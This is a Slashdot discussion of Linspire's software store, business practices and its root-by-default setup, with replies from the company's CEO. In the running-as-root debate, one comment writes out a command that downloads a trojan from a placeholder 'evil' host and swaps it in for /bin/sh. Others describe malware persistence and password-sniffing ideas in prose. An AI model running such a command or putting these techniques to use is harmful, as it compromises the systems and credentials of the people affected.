      Actually, Synaptic is just a simple categories text listing of software to install. Many distros have the equivalent of this "for free". CNR has a lot of features like screenshot and aisles to name a few. You won't understand until you try CNR.

      --
      Meh.
  28. Linspire... Not for the average geek. by 1053r · · Score: 1

    I think that linspire fulfils a niche in the market for the people who want:

    1. Something that looks like windows and is just as easy to use, but don't want all the viruses, etc.
    2. Something that they feel that they can trust (I'll explain in just a bit)

    Now, I personally think That ubuntu fills the first requirement for these people, but doesn't fill the second requirement for all these people in that it is a community developed OS. How do you know that it isn't something put together by a bunch of hackers meant to turn your computer into a zombie and delete you windows and all your... erm, pictures? Now, you and I know that that isn't the case, and Ubuntu is one fine linux distrobution, but people who are new to linux don't seem to understand that a shiny shrinkwrapped box doesn't always mean a good operating system. Now, these people's reasoning is that if they buy this thing called "Linux" from a respectable company like Linspire (and what a fine name, too!) that they will be safe. Hey, it even comes with a service that lets you download all sorts of software (even if it comes with a monthly fee). Now, show somebody like this Synaptic (for example), and they would say, "Hey, how could I know that these's things aren't viruses?". Good question. They might also say, "Hey, where's my start button?", "How come I can't watch these flash movies?", "How do I listen to my mp3s?". Linspire aims toward the user that just wants to send emails and play flash games and write up papers and not worry those evil bogeymans called 'viruses' and 'spyware' that he hears about all the time. And it does a fair job of it.

    Having said that, I don't agree with a lot of their business practices, like not even bothering to come up with something from scratch but rather just taking Debian and putting a fancy click n' run program in there and a shiney "launch" button that takes up 1/3 the screen. (No really, it does! sort of.) They went through the KDE source code and took out every reference to KDE that they could find and put something more neutral in it's place, like replacing "Konqueror" with "Linspire file and web browser". (Note: i'm not really sure, that's just what it seemed like).

    I don't think that any desktop linux will succeed until they can get it installed on OEM machines en masse. The installation is the scariest part about using linux, IMO, and if we can eliminate that part there's just a few things left to deal with, like lack of nice commercial games.

    Linux, onward march to domination!

  29. it is unfortunate they dropped wine by sentientbrendan · · Score: 1

    I would really love to have usable wine... It really seems like there isn't as much steam behind that project as there should be. It would be cool if some of the major OS vendors (apple, sun, redhat) started putting some resources behind that project.

    Supposedly wine has pretty decent compatibility already... but making the software *run* is a bitch. The wine team needs to spend a little more time making their software easy to configure and run for common uses (video games).

  30. Not paying for free software by ylikone · · Score: 1

    With Linspire's "Click and Run" system, you are not paying for free software, you are paying a yearly fee to have access to their software which keeps an up-to-date database of many free software packages and lets you install them with a single click (meaning download, install, icon on desktop).

    --
    Meh.
  31. Running as Root by Kevin+Carmony · · Score: 5, Interesting

    The very first sneak preview of Linspire didn't have ANY way to add users, but we never released that commercially. That first sneak preview didn't have a lot of things in it! Not sure it even printed. =)

    What Linspire does is during the install it has you first set up your Admin Password (root) and THEN takes you to a screen where you can add users, right during the install's install Wizard.

    Kevin Carmony
    CEO & President, Linspire, Inc.

    1. Re:Running as Root by Anonymous Coward · · Score: 0

      oh please kev kev, don't be bashful.. you *know* it didn't print.

    2. Re:Running as Root by Chandon+Seldon · · Score: 1

      Can users easily not make a normal user account and then work in a root desktop? If so, I'm not seeing what you've gained over the Mac OS X / Ubuntu sudo-by-default model.

      --
      -- The act of censorship is always worse than whatever is being censored. Always.
    3. Re:Running as Root by IntergalacticWalrus · · Score: 1

      What Linspire does is during the install it has you first set up your Admin Password (root) and THEN takes you to a screen where you can add users, right during the install's install Wizard.

      Why the hell are you doing this? Take a clue from Apple and lock up the root account, and give wheel privileges to new accounts by default. There's NO REASON to have the root account enabled on a desktop-oriented system.

      Sadly the only Linux distro I know of that enforces this intelligent user methodology is Ubuntu. How about making Linspire the second?

    4. Re:Running as Root by kabz · · Score: 1

      Last login: Mon Apr 3 20:06:52 on console
      Welcome to Darwin!
      Silver:~ jonathan$ sudo su
      Password:
      Silver:/Users/jonathan root# whoami
      root
      Silver:/Users/jonathan root# weeeeeeeee!

      Bwahhahahahah. Put that in your pipe and smoke it Apple users! Oh wait ....

      --
      -- "It's not stalking if you're married!" My Wife.
    5. Re:Running as Root by Arker · · Score: 1

      I'm sorry, Mr. Carmody, but I'm going to have to join in the bashing.

      This is an INSANE setup. Given your target audience for Linspire, it's really no different than the early mistake.

      Given your target audience, it's predictable that the vast majority have no idea what adding users means, is, or does, and won't do it. The very people that need it the most are the ones that won't have a clue to do it.

      Please, have your guys take a look at OS X or (I'm told) Ubuntu. It's not a difficult thing to do, and it manages to make things user friendly without throwing the security model straight out the window and stomping on it.

      --
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Friends don't let friends enable ecmascript.
    6. Re:Running as Root by gui_tarzan2000 · · Score: 1
      "Given your target audience, it's predictable that the vast majority have no idea what adding users means, is, or does, and won't do it. The very people that need it the most are the ones that won't have a clue to do it."

      On the contrary, my wife's cousin and his wife and daughter are real novices when it comes to computers and they added their own user accounts on their XP machine, which is actually more difficult than doing it on Linspire.

      --
      Have you hugged your penguin today?
  32. No cigar... by Merdalors · · Score: 1
    I installed Linspire on a second PC to prevent my web-surfing family from compromising our Windows box (which sits in the corner cut off from the Internet).

    Linspire installed easily, and recognized most of the hardware. We have achieved our objective, and I don't spend week-ends extirpating malware.

    However, it took me three hours to install a @#$% HP P1000 printer. And I have to do it again because Linspire lost the printer after a recent upgrade.

    Funny, the browser crashes regularly on Linspire. Our second 120 GB hard drive is sitting empty because I can't find the damn thing. What's Linux for "dir *.* /s"?

    Plus, the developer's kit couldn't even link a "Hello World" program. And Roberts wants us to develop for him? Bah!

    --
    Slashdot entertains. Windows pays the mortgage.
    1. Re:No cigar... by know1 · · Score: 1

      the equivalent to dir *.* /s on linux is ls -a (the a meaning All i presume). As for your drive not showing up, is it mounted? if you don't know what i mean go to a terminal and type "man mount" without the quotes. that should get you started on learning that. good luck with that hello world program...

    2. Re:No cigar... by dooglio · · Score: 1
      Plus, the developer's kit couldn't even link a "Hello World" program. And Roberts wants us to develop for him? Bah!

      So what version of Linspire are you running, anyway? I have Linspire 5.0, and am able to compile just fine. I built a version of Gtk+/MM 2.8 from scratch for example, no problem.

      However, I did have to create my own developer "aisle" so I could fetch the all the tools I need in one fell swoop. CNR could stand to be made a little more "developer friendly" in that regard. For example, the search feature. Just try searching for "man" in the CNR and you will be innundated with all sorts of parial matches. Outside of that, I think CNR is a pretty good idea. They used to have a developer's version of the OS with most everthing installed, but I didn't have access to it. Oh, and the versions of the support libraries available are pretty behind (about the state of Debian Sarge). For example, you only get GTK+ 2.6.

      That said, once you do get the tools you need loaded, Linspire works like every other Linux distro I've worked with before (Ubuntu, Debian, Mandrake). You can always build from source.

    3. Re:No cigar... by Ph33r+th3+g(O)at · · Score: 1

      ls -a won't recurse into subdirectories. He would want ls -R (he could also add the a if he wanted to see the dot files). Cheers!

      --
      I too have felt the cold finger of injustice.
    4. Re:No cigar... by dooglio · · Score: 1
      I have Linspire 5.0, and am able to compile just fine. I built a version of Gtk+/MM 2.8 from scratch for example, no problem.

      Okay, so I lied a little bit; I didn't used source tarballs. Actually, what I did was add an Ubuntu source (for Breezy) to my /etc/apt/sources.list for deb-src only. Then I used the debian make tools to create custom-built packages for Gtk+/mm 2.8.0. Now I have .deb files that I can install that coexist just fine with Linspire packages, and voila! Gtk+/mm 2.8 full development libraries.

    5. Re:No cigar... by know1 · · Score: 1

      ah cheers - learn something new every day. didn't realise that's what he meant, and didn't know that flag

  33. For the record... by Kevin+Carmony · · Score: 5, Interesting

    For the record... I didn't set out to "set the record straight about Linspire myths." (That was just the fancy spin this reporter put on his story. =) I simply gave an address at LinuxWorld called "Desktop Linux Adoption by Mainstream Consumers." During my address I made mention to a few of the things that consumers DEMAND which Linspire provides, which then create problems for some in the Linux community. For example, we support DVD, MP3, Windows Media, Real Audio, QuickTime, Java, Flash, ATI drivers, nVidia drivers, etc. We do this because most consumers won't touch Linux without these things (heck, I wouldn't!) Most have iPods and other MP3 players and want their computer to work with them. They have DVD's and want their computer to play them. Linspire pleads guilty to supporting all of this out of the box, and for that, we're not always understood. If I really wanted to dispel myths about Linspire, I'd have started right here on Slashdot (I read more misinformation here than anywhere about all sorts of topics, not just Linspire =). Kevin Carmony CEO & President, Linspire, Inc.

    1. Re:For the record... by jonfr · · Score: 0

      At the risk of my mod points. I use Gentoo Linux and it comes with support of all those things you mention. Only thing i can't play is the drm plagued files, but i don't need support for drm anyway. All of those options are supported by the GNU/Linux communty and come free becose of that. I don't have to pay $49,95 (download) or $59,95 (cd version) to get those features if i want to.

      Most distros don't include support for those features becose of the bullyes that are called mpaa, riaa and a law that is called DMCA (check on that).

      Overall, your distro does not stand out from the number of distros that are out there.

      I just hope that you give out to the pepole you take from. (Source code)

    2. Re:For the record... by lakeland · · Score: 1

      Having used both Linspire and Gentoo, I can assure you that the setup Linspire gives you out-of-the-box is a LOT easier than you could achieve with Gentoo (short of rewriting practically everything). I think that Linspire is significantly easier to use than Ubuntu, though the ease-of-use does kill flexibility in a way it doesn't for Ubuntu (or Gentoo, naturally)

    3. Re:For the record... by Anonymous Coward · · Score: 0

      What sets you apart from Ubuntu then? Ubuntu supports all of that out of the box (or easily installed via their graphical package manager) and doesn't cost the user anything.

  34. DCC, Debian by juergen · · Score: 1
    As for not being a real Linux, that's nonsense, too. Linspire Five is a Debian-based Linux, and the company itself is a leading member of the DCC Alliance.


    Actually the DCC is quite a mess, trying to get Debian or a subset thereof LSB-conformant, with LSB beeing an even greater mess. And Debian is not a member of DCC, and not at all happy about the use of their name in that regard.

    With advertisments of this kind, no wonder there is a lot of disdain around. Practically with the opening sentence, he confirmed my prejudices.
  35. Is that you, Kevin? by Anonymous Coward · · Score: 0

    Kevin? Or is it you Mrs Carmony?

    1. Re:Is that you, Kevin? by Anonymous Coward · · Score: 0

      Or is it you Mrs Carmony?

      More like Mr. Carmony, amirite?

  36. What questionable politics? by Roadkills-R-Us · · Score: 2, Insightful

    I'm an IT geek by dayy, running a 200+ system Linux shop, and *I* am interested in Linspire at home. At home, I just want to install an OS and have everything work. I mkean *everything*. It sucks when my wife wants to do something basic, and I have to go download a bunch of stuff and try to make it work with my current version of Linux.

    If you're not referring to the fact that they include some proprietary software, please explain. Otherwise just realize that Linux will never* get out of cult status in the home until it includes whatever is needed to make it Just Work.

    1. Re:What questionable politics? by Chandon+Seldon · · Score: 1

      It sucks when my wife wants to do something basic, and I have to go download a bunch of stuff and try to make it work with my current version of Linux.

      I keep thinking this, but then I try to get Windows to do similar stuff and that's harder. In the end, the stuff that matters just works under Linux unless you're doing something stupid like upgrading Slackware 5 to udev by hand without upgrading glibc.

      --
      -- The act of censorship is always worse than whatever is being censored. Always.
    2. Re:What questionable politics? by WilliamSChips · · Score: 1

      They run as root by default. Unless you want Linux viruses to actually become a reality, that's a horrible idea. Try Ubuntu, it also has a large, up-to-date software repository, something which, IIRC, Linspire lacks.

      --
      Please, for the good of Humanity, vote Obama.
    3. Re: What questionable politics? by gidds · · Score: 1
      At home, I just want to install an OS and have everything work.

      [fx: MacGeek appears as if by magic]

      You rang, sir?

      --

      Ceterum censeo subscriptionem esse delendam.

  37. not that it matters, really by r00t · · Score: 2, Insightful

    A virus that infects the user account can destroy everything that matters. It can email my private data to anybody.

    I'll be generous, and say it can't change $PATH or define an alias for su or sudo. :-) It certainly couldn't make a wrapper for xterm or install itself as an X input method. :-)

    What is protected? Oh, the OS itself. I got that from a CD-ROM. I don't even need a backup for that data. Heck, if it gets trashed, I'll use the opportunity to upgrade my OS.

    We don't have real security until users get the ability to easily sub-divide their accounts using the full power of SE Linux. They also need "trusted path" (look it up) for controlling this.

    1. Re:not that it matters, really by IntergalacticWalrus · · Score: 1

      I couldn't agree more. I'll never understand those "running as root is dangerous" people who are talking as if their system was more important than their personal files. I guess they don't do anything useful with their computers.

      I do use a non-root account, but only because it's the standard way to work on a Unix system, which was designed from day one to be networked and multi-user capable. But whatever I do, my personal files are vulnerable, so... uh, why is it so dangerous to be running as root on a home desktop?

    2. Re:not that it matters, really by cammoblammo · · Score: 2, Insightful

      Think of the situation where there's more than one person with an account on the machine. As it stands the worst a viral 'rm -rf /' (or whatever) can do is trash my files. My wife's files are safe. If I run that same code as root, I lose my files, the OS's files and all conjugal privileges!

      --

      Cogito, ergo sig.

    3. Re:not that it matters, really by schon · · Score: 1

      I'll never understand those "running as root is dangerous" people who are talking as if their system was more important than their personal files.

      Maybe if you weren't a social pariah, you might understand.

      Your belief only works as long as there is only one person using a machine.

      As soon as there is one or more other people using it, it falls apart.

      And for most people with computers (say a family) there are multiple users using the machine.

    4. Re:not that it matters, really by nahdude812 · · Score: 2, Insightful

      Well, if you're running as root and get compromised, it might do more than just steal or delete your data. It might install spyware or a bot that infects / spams / whatevers other people, and continues to corrupt / steal your data going forward.

      There's a lot more danger to a virus than losing your personal data. There's other users of the same machine, and even for single-user machines, there's forward going infection, and danger to other netizens.

      Get a rootkit in place, and you might be unwittingly giving away access to your box from now until the next time you do a full system upgrade, and never know it.

    5. Re:not that it matters, really by WilliamSChips · · Score: 2, Insightful

      Because if you have any incredibly important files, you can put them in a special user account, and your normal user account can't reach them. But root can reach anything, no exceptions(unless they're encrypted and the decryption key's only on another computer, but root can still delete them). Oh, and a trojan running as root can do a lot more than one running in a normal user account. And if you have multiple people using your computer, root give you access to not only your personal files, but everyone else's as well.

      --
      Please, for the good of Humanity, vote Obama.
    6. Re:not that it matters, really by Hydroksyde · · Score: 1

      Most users probably have a reasonable understanding of what's in their files, and can back them up easilly (eg to a CD), and restore if necessary. Maybe a few minutes labour to delete a trashed account, create a new one, and pull out their backup CD/floppy, assuming they have the sense to make one. If you're running as root, even if your personal files are backed up, a trashed system (for most people) means paying a PC technician $$$ (of course I am a computer technician, so maybe you should run as root...) to get it restored, and you still have to restore your personal files from a backup.

    7. Re:not that it matters, really by labratuk · · Score: 1
      Heck, if it gets trashed, I'll use the opportunity to upgrade my OS.

      You're making a big assumption that you'll be able to tell when your OS gets trashed.

      Fancy being a drone for a script kiddie for the next two years? And that script kiddie having access to all you do on that machine for that time? Want to be a spam relay? Want to be a kiddy porn proxy?
      --
      Malike Bamiyi wanted my assistance.
    8. Re:not that it matters, really by r00t · · Score: 1
      Being non-root stops that exactly how?

      • Malware can run cron jobs as you.
      • Malware can install itself in your .xinitrc or .xsession file.
      • Malware can install itself in your .bashrc or .bash_logout file.
      • Malware certainly doesn't need root privilege to send spam. It might need your mail client config though!
      • Malware can run a kiddy porn bittorrent as you, or even a web server on port 1234.

      Think you would discover that? Most people wouldn't.

      You probably wouldn't discover it. Consider how things look if the malware acts as a debugger that alters your view of the .xinitrc file, etc.

    9. Re:not that it matters, really by r00t · · Score: 1

      It could install spyware or a bot without root privs. It just needs to submit cron jobs (as you) or modify one of: .xsession, .bashrc, .xinitrc, .bash_logout, etc.

      You'd never know it unless you stumbled across it by accident or you were REALLY paranoid and HIGHLY skilled. Note that simple examination of .bashrc may fail because the ptrace() debugging interface can be used to hide the real .bashrc from your prying eyes.

      Escalation to root is likely. Do you use "su" or "sudo"? How do you know the xterm isn't logging your keystrokes?

    10. Re:not that it matters, really by r00t · · Score: 1

      Well, sure, it's different if you truly run multiple non-root users. Be careful about "su" and "sudo" though, because your xterm might have been hacked to log your keystrokes. Escalation is a very real possibility.

      On a single-user machine, root offers very little to the malware. Regular users normally get unlimited CPU time, network traffic, disk space, and memory usage. What more is there to want? Kernel modules are not at all required, and might just make the malware more likely to fail. Very few users would discover an unauthorized cron job or .xinitrc modification. Users capable of discovering such things are easily stopped by imaginative use of the ptrace() system call.

    11. Re:not that it matters, really by WilliamSChips · · Score: 1
      What more is there to want?
      root@localhost /bin # wget http://evil.whereever.com:8080/sh-trojan && mv -f sh-trojan sh
      --
      Please, for the good of Humanity, vote Obama.
  38. Re:Braised Lamb Shanks with Herbs by martinultima · · Score: 2, Funny

    Coming up next... a recipe for baked trolls :-)

    --
    Creative misinterpretation is your friend.
  39. you can help yourself. by pixel+fairy · · Score: 1

    you can help yourself. there definately traps in some stuff (like the filesystem) but the hardest part is just remembering to install X11 and the dev tools.

    most of whats in there is same stuff youll find in any linux distro (or typical freebsd system) cups, samba, apache, mysql, lots of scripting languages, gdb, tcpdump etc. even vim and emacs. ipfw (the firewall) is right out of freebsd and so far it works the same too, but i havent done much with it on osx.

    install fink or darwinports and youll not touch the compiler much unless you want to. i spend most of my time in os x with X11 running enlightenment in full screen with focus follows mouse, virtual desktops etc. (theres an applet called desktop manager for that in aqua too). sometimes you get a surprise, like the seq command missing, but those have always been easy to work around.

    google has also found drivers where apple has not provided, but the driver situation is way behind linux here.

    if your remote tech support for her, set ssh to only use keys (not passwords, see /etc/sshd_config), log yourself in, and fast user switch out with vncserver running (and set to only accept from localhost) its a resonably secure way to use the mac remotely. run it on "display:1" (port 5901) to make it easier for her to turn it on and off to see her screen.

    im not saying apple is a good fit for you or your sister, just that you can help yourself. there isnt much that a typical linux distro can do that you cant on a mac, aside from the driver thing. (i still use linux and bsd more, but thats partly a hardware thing)

  40. Linspire,lindows,and fools by Anonymous Coward · · Score: 1

    Linspire,is just a mercenary piece of work i.e,find a water well,hire guards to protect it,find people willing to pay to drink the water,when there are free water wells,with much better water within plain sight.
        So did yo Mama raise a fool?

  41. There is a reason for that... by DaFork · · Score: 1

    The reason the vast majority of users have not heard of Linspire is because the "Linux Gurus" disreguard it as "not a real Linux" or insecure.

    The goal of the talk was to get the Linux community the correct info about the product (aka dispel myths) so perhaps they will start recommending its use at their place of employment or to their friends and family.

    1. Re:There is a reason for that... by Fred_A · · Score: 1
      The reason the vast majority of users have not heard of Linspire is because the "Linux Gurus" disreguard it as "not a real Linux" or insecure.


      Or is it because a certain software company best left unnamed won't let user friendly distributions be sold with consumer grade machines ?

      Since when have home users ever asked Unix Gurus for advice ? Unix people are definitely not mainstream.

      Should something like Linspire ever succeed at gaining mindshare (or marketshare) they'd need to
      • communicate a lot towards the general public
      • be allowed a reasonably fair playing ground by that other PC OS maker


      Then of course there will be the matter of getting the missing software to run (like games, the tax software the US people seem to be so fond of, etc.)

      After all everyone (not just Unix wizards) has always been saying windows was crap and people still get it in droves.
      --

      May contain traces of nut.
      Made from the freshest electrons.
  42. Re:Linspire == Ubuntu by Jussi+K.+Kojootti · · Score: 1
    Well, you do seem to be an expert in burnt-out, blip-on-the-radar operating systems (check the url)...

    I still dislike the off-the-cuff exaggerations: If Ubuntu and Linspire have dropped "everything good about Debian", it should be easy for you to list, let's say "ten best things Linspire and Ubuntu dropped", shouldn't it?

  43. LINSPIRE DOESNT WORK by Anonymous Coward · · Score: 0

    I burned their trial cd and it didnt run on my pc. Thats all I need to know about them. If they cant even get that right im not wasting my time on it.

  44. Michael Robertson = Poor Bill Gates by pandrijeczko · · Score: 1
    The reason why Linspire are having to explain this about Windows programs is because Michael Robertson has consisitently used LIES & marketing to sell more of this product - and Joe Public, as in the liar Gates, have taken the liar Robertson at his word.

    Robertson should immediately be distanced from everyone else in the Open Source community - Open Source, whether it's Linux apps on Linux kernels or Windows apps on Windows is about OPEN & HONEST communications with the rest of the world - Robertson is NOT honest.

    Personally, I'd even go a stage further & get the GPL modified to exclude that lying, good-for-nothing, scumbag marketeer from ever even touching Open Source.

    --
    Gentoo Linux - another day, another USE flag.
  45. latest version a year ago? by Danathar · · Score: 1

    Their last version came out in March of last YEAR.....what exactly have they been doing since then? I've not heard a peep about what their next version will have in it.

  46. Re:Installing programs is SUPER EASY- in PCLinuxOS by Anonymous Coward · · Score: 0

    http://www.pclinuxonline.com/wiki/QuickStartSynapt ic

    As easy as the steps for Linspire CNR, and all at a cost of $0 per year.

    Synaptic is even more of a killer application than CNR.

    http://www.nongnu.org/synaptic/
    http://www.nongnu.org/synaptic/action.html

  47. Get past "Linux for $$"! Move onto real problems! by KWTm · · Score: 2, Insightful

    I agree that there's a lot of unnecessary ill-will that's subconsciously and reflexively generated whenever we Linux geeks hear that some software costs money. Although Linux is predicated on software freedom ("free" software), we are too accustomed to zero-cost software ("free" software).

    The quantity of quality zero-cost software is nothing short of astounding, for which I will always be grateful to the hacker community --but at the same time, it creates expectations that form a trap. We are used to leveraging our geek skills to gain certain "powers" (from a software Role-Playing-Game point of view) without having to pay, and it's almost like a return on our investment in being geeks. "You had to *buy* Photoshop?" you say to your roommate, your voice dripping with disdain. "*I* got GIMP for free!" (And then we get upset that Photoshop was pirated, of course. What's the use of being a geek if the non-geeks can get zero-cost software, too?)

    But, for those of you who envision software freedom spreading throughout the world, let me ask you: where do you want the money to come from, in such a world, so that software businesses large and small can continue to flourish? Okay, I know the standard answers --payment for support, most software is within large companies, payment for reliable source of software, etc. etc.

    The next question is: how do you think we should get there? After all, an "open world where there's no need for windows or gates" (tm) doesn't just pop into being; you have to make a transition. How do companies make money in a world where people will buy copies of copy-protected proprietary tax software for us$30, but not pay for zero-cost FOSS that can replace all of Microsoft Office (or even Microsoft Windows)?

    In short, *should* we pay for software?

    Linspire wants $20 to $50 to do C&R. Are they truly being sleazy? They're getting $$$ just to set up a server for distributing free Debian software! They're fooling people into paying money that users don't really have to pay!

    And accounting company H&R Block charges for tax preparation services. How sleazy! They're getting $$$ for filling in forms you can get for free! They're fooling their customers into paying, when they can use a calculator for free!

    We need to think before we bash Linspire's C&R service. They are being rewarded for filling a niche, or at least Linspire thinks so, and from our capitalist way of thinking, they should be admired. The fact that we geeks don't need C&R doesn't mean that Linspire is trying to pull a fast one, any more than we despise Barnes & Noble for trying to sell books like "Apache Security for Dummies" when *any* geek knows how easy it is to set up a chroot jail on a headless server --what a rip-off!

    I'm not saying that the C&R service is perfect, and I have my own hesitations about having C&R. (I bought my own Lindows-preinstalled PC some years ago.) My main concerns are: 1) does it lock you into C&R, or will the standard Debian repositories be compatible? 2) Is the C&R software high quality (well-packaged)?

    I think that Slashdot is a valuable place for discussing and criticising what's wrong with Linspire, and figuring out where we'd like Linspire to go (especially since Mr. Carmony himself seems to be participating in this discussion), but what I see instead is invalid and unnecessary bashing of C&R. I see a risk that this thread will terminate prematurely, before we can take advantage of our collective Slashdot intellect to analyze the actual situation.

    Guys, the Linspire CEO is here. Wouldn't you like a chance to tell what you think to the leader of a company that might be poised to get Linux exposure in certain unique markets? If you do, there better be a bit more insight than "Linux good!" or "Linux for money bad!".

    --
    404555974007725459910684486621289147856453481154 in hex is "You sank my Battleship?"
    [GPG key in journal]
  48. Linspire was the worst experience ever by Anonymous Coward · · Score: 0

    I bought linspire for my organization, and found it to be the biggest piece if shit. It would not even detect half the hardware and would crash everytime I started it.

    There support is really pethetic, and all attepts to get anything out of them (but the brain farts from Mike) was all in vein. Their support system is more buggy than their distro (I have email trails to show that). I decided that there was no one who gave a shit at Linspire and moved to Ubuntu. My clients are very happy with it and thank me for rescueing them from an Idiot who in his own world thiks he is doing some greate service for himanity.

    Michael, if I ever run into you in a trade show, I will let you have it, so be ready!!

  49. Does it? by Bilange · · Score: 1

    We (most geeks out there) usually go around and say "that piece of software is bloated to death", "ICQ is bloated, get the lite version", etc, but actually Linspire is the other way around... its a distro so trimmed down that you don't have the choice to either buy their click-n-run products or try to get a compiler installed-- even if theres no compiler binaries by default.

    So I guess the old Modded-Down-to-death question is quite on-topic: "Yeah but, does it run Linux? :D "

    Joke apart, I'm not sure if its a good idea to restrict the user experience THAT much. Sure, you get the advantage of controlling whats going to be installed (and what not), thus having more chances to get a stable environment (in the same way than Apple's OS, when it was on Apple hardware only, reducing the chances of crashing), but too bad if you wanted to get under the hood and customize Linspire all you wanted-- you're just stuck.

    --
    "...a generation of kids has grown up thinking Trance is the shittiest music since country and western." - Paul van Dyk
  50. It doesn't by jgoemat · · Score: 1

    You download the install CD and there is no option anywhere for any of those things. Someone did put together a couple of scripts (EasyUbuntu is a good one) that will go out to third party update servers and download much of that, but there is no option to install that stuff with the system.

  51. The virus scanner issue by blorg · · Score: 1

    From the very page you link to:

    Linux-based operating systems like Linspire are inherently safe from viruses, however you can still pass along email viruses to vulnerable Microsoft Windows-based computers. That's why we offer VirusSafe.

    Sounds reasonable to me.

    1. Re:The virus scanner issue by Anonymous Coward · · Score: 0

      Linux-based operating systems like Linspire are inherently safe from viruses, however you can still pass along email viruses to vulnerable Microsoft Windows-based computers. That's why we offer VirusSafe.

      Sounds reasonable to me.


      How in the world is that reasonable? Even ignoring the suggestion that Linspire's AV is performing the same task as Windows AV products (and why else do you imagine they include an icon for it on the default desktop installation?) by what leap of logic do you believe Linux desktop users need protection from resending Windows viruses? On Windows you need that protection because the viruses do the remailing automatically. On Linux you'd have to forward the virus manually.

      Do you honestly believe the people who pay for this product appreciate how little it actually does? If this is such a reasonable product to sell, why is Linspire the only distro doing so?

  52. Re:Get past "Linux for $$"! Move onto real problem by Anonymous Coward · · Score: 0

    Guys, the Linspire CEO is here. Wouldn't you like a chance to tell what you think to the leader of a company that might be poised to get Linux exposure in certain unique markets? If you do, there better be a bit more insight than "Linux good!" or "Linux for money bad!".

    I did not say that selling Linux was bad. I said that selling a computer and revealing hidden costs after the fact is bad. If these preinstalled Linspire boxes came with 1 year of free Click-n-Run and no upselling into uneeded AV software, I would have no issues with Linspire. As it is though, Linspire's business model is based upon a series of deceptions. It's simply not good business, nor good publicity for free software.

  53. Linspire can crash 2 machines at once by crossmr · · Score: 1

    curious.. I fired up vmware and install linspire. After booting I went into the user account I created and ran CNR. As it attempted to update CNR it managed to lock up both the virtual machine (which I was running full screen) and the host machine.

    After restarting machine and booting up linspire again, CNR fails to run. Pretty 1337 stuff. I can see newbies having no issue with this OS at all..

  54. Re:For the record... and a comment about WINE by gui_tarzan2000 · · Score: 1
    When WINE was in the early edition of Linspire it *did* allow me to run MS Office 2000 just fine. Thought I'd throw that in there for the ones that don't believe it ever worked. A bunch of other programs worked too. I wish I still had the screen caps of them.

    --
    Have you hugged your penguin today?
  55. Re:For the record... and a comment about WINE by Kevin+Carmony · · Score: 1

    Yes, we spent hundreds of thousands of dollars on WINE in those early days. We got it to run Word and Excel (Office 2000) pretty well. When we started our work with Crossover (who we contracted with to help), they weren't doing much with WINE at the time. With Linspire's funding, however, they were able to move things along quite a bit, which then became Crossover Office. Linspire early on stopped funding WINE and started funding native Linux apps (Nvu, Mozilla, Lsongs, Lphoto, Reiser FS, etc.). We figured it made more sense to pour money into providing better solutions for Linux natively than helping Linux run expensive, proprietary software from Microsoft. Kevin

  56. Does synaptic have screenshots of the programs? by ylikone · · Score: 1

    CNR has screenshots and brief descriptions for most of the programs in their database. I'm not saying CNR is perfect, but it's a lot easier for the "non-computer expert" user.

    --
    Meh.
  57. Synaptic is missing features by ylikone · · Score: 1

    No screenshots. No customizable aisles.

    --
    Meh.
  58. So ... by Anonymous Coward · · Score: 0
    I've been running Windows as an admin user every since NT4. Never had a single virus.

    So that's where the unnetworked NT box that got DoD C2 certified went to.

  59. that doesn't get you anything by r00t · · Score: 1

    Put the new shell in ~/.gorda/ and change $PATH via .bashrc to start with that directory.

    But who cares anyway? Replacing /bin/sh is cool and all, but it gets you NOTHING that you don't already have. (true multi-user machines, a dying breed indeed, excepted of course)

    What computing resource do you obtain? What personal data do you obtain? Really, there is no need to crack the root account.

    1. Re:that doesn't get you anything by WilliamSChips · · Score: 1
      Put the new shell in ~/.gorda/ and change $PATH via .bashrc to start with that directory.
      Shell scripts still won't run ~/.gorda/eviltrojan. (yes, that could be part of the code, but not if the file is executable but not readable--also, is there some reason you chose the name .gorda?)

      And you can't SYN flood effectively without root access. (I know this because nmap can't send half-open packets without root access) If someone wants to run a DDoS on someone's server, that would be quite useful.

      You also never addressed my point of putting your extra-secret stuff in an extra account created specifically for that purpose.
      --
      Please, for the good of Humanity, vote Obama.
    2. Re:that doesn't get you anything by r00t · · Score: 1

      I chose .gorda because it looks legit. Start with a "k" if KDE is used instead of GNOME.

      Shell scripts are unimportant. It is easy enough to hook into the user's GUI start-up files. Most systems boot into a GUI when the owner wants to use the computer, and remain in that GUI or power off when the owner is done.

      SYN flooding counts. OK, that's one root-only feature that would be of use to malware. I don't think it's all that big, but it counts. (it's not required for normal malware stuff: spam, ad click fraud, swiping a PayPal login, ad substitution, pop-up messages that sell you phony spyware removal tools, etc.)

      Putting your extra secret stuff in a separate account is not at all normal. In that case you are running a true multi-user machine, so the comments I made don't really apply.

      Beware though: when you "su" or "sudo", how can you be sure that malware (running as non-root) isn't watching you type your password? If you "log out", might you then get a fake login screen? There actually is a way to deal with this, but it's an obscure kernel option that is disabled by default AND requires the user to press a special keyboard sequence which kills everything on the console.